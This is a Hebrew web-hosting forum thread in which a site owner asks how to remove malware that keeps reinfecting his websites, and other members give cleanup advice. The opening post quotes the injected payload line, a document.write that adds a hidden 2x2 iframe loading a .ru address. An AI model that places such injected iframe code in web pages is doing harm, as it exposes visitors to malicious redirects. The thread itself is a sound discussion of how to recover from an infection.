הרשם שאלות ותשובות רשימת חברים לוח שנה הודעות מהיום

חזור   הוסטס - פורום אחסון האתרים הגדול בישראל > עיצוב גראפי, תכנות על כל שפותיו וקידום ושיווק אתרים > פורום תיכנות

   
|!|

השב
 
כלים לאשכול תצורת הצגה
ישן 12-07-12, 14:45   # 1
Mishel
חבר מתקדם
 
מיני פרופיל
תאריך הצטרפות: Aug 2011
גיל: 35
הודעות: 698

Mishel לא מחובר  

בעיה|וירוס באתר

שלום, יש לי בעיה בכמה אתרים שלי, ברובם יש וירוסים, לאחר שדיברתי עם כמה אנשים אמרו לי שזה בא מהמחשב שלי ושאני מתחבר לFTP זה פשוט מדביק את כל האתרים, עכשיו בקיצור הם שלחו לי גם
מסמך טקסט עם קישורים איפה הוירוס נמצא וניקיתי הכל, לאחר מכן התגלו שוב וירוסים ולהפתעתי פתחתי את כל הקבצים של האתר (הכל כולל הכל, גם CSS, גם JS פשוט הכל!) ולא הייתה שורה אחד של הוירוס, אבל שמסתכלים בקוד מקור עדיין רואים את הקוד.

מה אני יכול לעשות? לפי מה שהבנתי האנטי וירוס NOD חוסם את האתר שלי ואני בטוח שגם גוגל מזהיר, מה הפיתרון?

השורה של הוירוס:

ציטוט:
document.write('<iframe src="http://flip sph ere .ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
(אם נכנסים לקישור זה מעביר לBING)

לפי מה שהבנתי זאת בעיה מאוד ידועה היום והרבה בעלי אתרים נתקלים בה, וגם למיטב הבנתי האנטי וירוס לא מתמודד עם הוירוס הזה.

מה אפשר לעשות?
  Reply With Quote
ישן 12-07-12, 15:19   # 2
IgalSt
מנהל פורום, עסק רשום
 
IgalSt's Avatar
 
מיני פרופיל
תאריך הצטרפות: Oct 2005
מיקום: המרכז
גיל: 38
הודעות: 1,432
Send a message via Skype™ to IgalSt

IgalSt לא מחובר  

לפני שמתחילים, חשוב לנקות את המחשב שלך מוירוסים כדי שהפעולות שלך לא יהיו לריק.

לאחר מכן, עליך להוריד את InfoRapid Search & Replace (או כל תוכנה דומה אחרת)..
השתמש בתוכנה הזאת על מנת להריץ חיפוש והחלפה בקבצים החשודים כנגועים.
עליך לחפש את הקוד שהוירוס שתל בעמודים שלך, ולהחליף אותו בשום דבר (כלומר סטרינג ריק).

כשאתה מסיים, העלה את הקבצים לשרת.
  Reply With Quote
ישן 12-07-12, 16:24   # 3
Mishel
חבר מתקדם
 
מיני פרופיל
תאריך הצטרפות: Aug 2011
גיל: 35
הודעות: 698

Mishel לא מחובר  

ציטוט:
נכתב במקור על ידי IgalSt צפה בהודעה
לפני שמתחילים, חשוב לנקות את המחשב שלך מוירוסים כדי שהפעולות שלך לא יהיו לריק.

לאחר מכן, עליך להוריד את InfoRapid Search & Replace (או כל תוכנה דומה אחרת)..
השתמש בתוכנה הזאת על מנת להריץ חיפוש והחלפה בקבצים החשודים כנגועים.
עליך לחפש את הקוד שהוירוס שתל בעמודים שלך, ולהחליף אותו בשום דבר (כלומר סטרינג ריק).

כשאתה מסיים, העלה את הקבצים לשרת.
המחשב שלי כבר עבר סריקה, כרגע אני מוריד את התוכנה שהצעת, אני פשוט מכניס לתוכנה את הקבצים ומה אז?

ותודה רבה

עריכה: לא חושב שהוירוס הוסר מהמחשב, אמרו לי לפרמט אבל זה בעיה גדולה עכשיו, אין דרך אחרת?

Last edited by Mishel; 12-07-12 at 16:44..
  Reply With Quote
ישן 12-07-12, 20:27   # 4
IgalSt
מנהל פורום, עסק רשום
 
IgalSt's Avatar
 
מיני פרופיל
תאריך הצטרפות: Oct 2005
מיקום: המרכז
גיל: 38
הודעות: 1,432
Send a message via Skype™ to IgalSt

IgalSt לא מחובר  

ציטוט:
נכתב במקור על ידי Wekey צפה בהודעה
המחשב שלי כבר עבר סריקה, כרגע אני מוריד את התוכנה שהצעת, אני פשוט מכניס לתוכנה את הקבצים ומה אז?

ותודה רבה

עריכה: לא חושב שהוירוס הוסר מהמחשב, אמרו לי לפרמט אבל זה בעיה גדולה עכשיו, אין דרך אחרת?
אם יש לך וירוס במחשב שכל פעם "מדביק" את הקבצים כשאתה מנקה אותם, נשמע כאילו שאכן אין דרך אחרת.
מה שכן, הייתי שוקל להשתמש במחשב חלופי על מנת לנקות את הקבצים ולהעלותם לשרת על מנת לחזור לפעילות סדירה ASAP.
  Reply With Quote
ישן 12-07-12, 21:33   # 5
בניה
משתמש - היכל התהילה
 
מיני פרופיל
תאריך הצטרפות: Oct 2005
מיקום: נחושה
הודעות: 3,434

בניה לא מחובר  

תנסה לסרוק את המחשב עם MALWARE BYTES, הסיר לי משהו דומה
כמו כן, אפשר להשתמש בGOOGLE DEVELOPER TOOLS כדי להבין אילו קבצים נגועים ולבקש מגוגל לסרוק מחדש כדי שיסירו את ההזהרה בכניסה לדומיין שלך
  Reply With Quote
ישן 12-07-12, 22:36   # 6
Mishel
חבר מתקדם
 
מיני פרופיל
תאריך הצטרפות: Aug 2011
גיל: 35
הודעות: 698

Mishel לא מחובר  

ציטוט:
נכתב במקור על ידי IgalSt צפה בהודעה
אם יש לך וירוס במחשב שכל פעם "מדביק" את הקבצים כשאתה מנקה אותם, נשמע כאילו שאכן אין דרך אחרת.
מה שכן, הייתי שוקל להשתמש במחשב חלופי על מנת לנקות את הקבצים ולהעלותם לשרת על מנת לחזור לפעילות סדירה ASAP.
אבל איך לנקות את הקבצים? חלקם עם מערכות ווורדפרס וגם שאני פותח קובץ קובץ אני לא מוצא את הנגועים.. בעיה גדולה.
ציטוט:
נכתב במקור על ידי בניה צפה בהודעה
תנסה לסרוק את המחשב עם MALWARE BYTES, הסיר לי משהו דומה
כמו כן, אפשר להשתמש בGOOGLE DEVELOPER TOOLS כדי להבין אילו קבצים נגועים ולבקש מגוגל לסרוק מחדש כדי שיסירו את ההזהרה בכניסה לדומיין שלך
סרקתי איתה כל הלילה ומצאה כמה מזיקים, הסרתי אותם, ובקשר לגוגל - נכנסתי לכלי מנהל האתרים אבל לא מצאתי בשום מקום רשימה של הקבצים הנגועים..

עריכה: מוזר מאוד, נכנסתי ל"אחזר כמו גוגל", הוא סיים את הפעולה ואז הוציא את הקוד מקור של האתר, אני רואה את השורה של הוירוס אבל אין אזהרה ואין כלום, גם שנכנסים ל"תוכנה זדונית".

Last edited by Mishel; 12-07-12 at 22:43..
  Reply With Quote
ישן 13-07-12, 12:14   # 7
IgalSt
מנהל פורום, עסק רשום
 
IgalSt's Avatar
 
מיני פרופיל
תאריך הצטרפות: Oct 2005
מיקום: המרכז
גיל: 38
הודעות: 1,432
Send a message via Skype™ to IgalSt

IgalSt לא מחובר  

ציטוט:
נכתב במקור על ידי Wekey צפה בהודעה
אבל איך לנקות את הקבצים? חלקם עם מערכות ווורדפרס וגם שאני פותח קובץ קובץ אני לא מוצא את הנגועים.. בעיה גדולה.
הרי לא סביר שתעבור על עשרות קבצים ידנית. זו בדיוק הסיבה שבגללה הבאתי לך את התונכה שיודעת לחפש בכל קבצים ממש מהר ולהחליף את התוכן שאתה מחפש במשהו אחר. השתמש בה.


ציטוט:
נכתב במקור על ידי Wekey צפה בהודעה
סרקתי איתה כל הלילה ומצאה כמה מזיקים, הסרתי אותם, ובקשר לגוגל - נכנסתי לכלי מנהל האתרים אבל לא מצאתי בשום מקום רשימה של הקבצים הנגועים..

עריכה: מוזר מאוד, נכנסתי ל"אחזר כמו גוגל", הוא סיים את הפעולה ואז הוציא את הקוד מקור של האתר, אני רואה את השורה של הוירוס אבל אין אזהרה ואין כלום, גם שנכנסים ל"תוכנה זדונית".
ייתכן ולא כל תוכנות האנטיוירוס מזהות את זה כקוד זדוני. אבל זה בהחלט אחד כזה ואתה צריך לטפל בבעיה.
  Reply With Quote
ישן 13-07-12, 13:57   # 8
BuildDream
עסק רשום [?]
 
BuildDream's Avatar
 
מיני פרופיל
תאריך הצטרפות: Oct 2010
הודעות: 527
Send a message via Skype™ to BuildDream

BuildDream לא מחובר  

כשאתה אומר שסרקת את כל הקבצי PHP, HTML של האתר שלך ולא ראית שום קוד זדוני - זה לא אומר שהוא לא קיים באתר
יש כ"כ הרבה אפשרויות להוסיף קוד לאתר - למשל בphp.ini אתה יכול להגדיר קוד שיתווסף אוטומטית אחרי/לפני כל דף שהוא מפרסר. וזאת רק דרך אחת מאלף.

וזה שיש לך שורות קוד שלא אתה כתבת באתר זה לא מחייב שזה וירוס, ובגלל זה יכול להיות שהוא לא רושם לך התראה על זה..
יש קודים שרק אוספים מידע, שותלים פרסומות וכל מיני דברים כאלה ולא מכילים וירוסים.

יכול להיות שזה וירוס במחשב שלך, ויכול להיות גם שהשרת שלך נפרץ ובכל פעם שמים לך קודים כאלה. יש המון דרכים לשתול קוד באתרים
__________________
BuildDream בניית אתרי אינטרנט לשירותך.
עסק רשום במס הכנסה ומספק קבלות כחוק.
www.BuildDream.co.il - www.iBuild.co.il
  Reply With Quote
ישן 13-07-12, 14:34   # 9
Mishel
חבר מתקדם
 
מיני פרופיל
תאריך הצטרפות: Aug 2011
גיל: 35
הודעות: 698

Mishel לא מחובר  

ציטוט:
נכתב במקור על ידי BuildDream צפה בהודעה
כשאתה אומר שסרקת את כל הקבצי PHP, HTML של האתר שלך ולא ראית שום קוד זדוני - זה לא אומר שהוא לא קיים באתר
יש כ"כ הרבה אפשרויות להוסיף קוד לאתר - למשל בphp.ini אתה יכול להגדיר קוד שיתווסף אוטומטית אחרי/לפני כל דף שהוא מפרסר. וזאת רק דרך אחת מאלף.

וזה שיש לך שורות קוד שלא אתה כתבת באתר זה לא מחייב שזה וירוס, ובגלל זה יכול להיות שהוא לא רושם לך התראה על זה..
יש קודים שרק אוספים מידע, שותלים פרסומות וכל מיני דברים כאלה ולא מכילים וירוסים.

יכול להיות שזה וירוס במחשב שלך, ויכול להיות גם שהשרת שלך נפרץ ובכל פעם שמים לך קודים כאלה. יש המון דרכים לשתול קוד באתרים
זה היה טעות שלי, הוירוס בא ממני, פשוט לאחר שאני מוחק את השורות של הוירוס והם אני לא רואה אותם הם חוזרים שוב.
ובקשר לשרת - לא, נעשו בדיקות מקיפות עם 2 טכנאים על הדברים האלה.

בכל מקרה כרגע אני מנקה את כל האתרים עם התוכנה שיגאל נתן.

תודה רבה לכולם.
  Reply With Quote
השב

חברים פעילים הצופים באשכול זה: 1 (0 חברים ו- 1 אורחים)
 


חוקי פירסום
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is מופעל
סמיילים הם מופעל
[IMG] קוד מופעל
קוד HTML מכובה

קפיצה לפורום


כל הזמנים הם GMT +2. הזמן כעת הוא 02:49.

מופעל באמצעות VBulletin גרסה 3.8.6
כל הזכויות שמורות ©
כל הזכויות שמורות לסולל יבוא ורשתות (1997) בע"מ